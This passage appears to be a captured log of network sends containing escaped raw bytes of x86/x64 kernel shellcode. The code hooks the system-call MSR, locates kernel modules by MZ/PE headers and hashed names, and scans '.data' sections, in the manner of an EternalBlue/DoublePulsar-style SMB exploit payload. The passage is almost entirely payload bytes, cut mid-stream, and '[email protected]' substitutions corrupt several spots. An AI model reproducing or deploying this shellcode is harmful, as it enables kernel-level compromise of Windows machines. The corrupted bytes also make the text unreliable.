\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 19, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\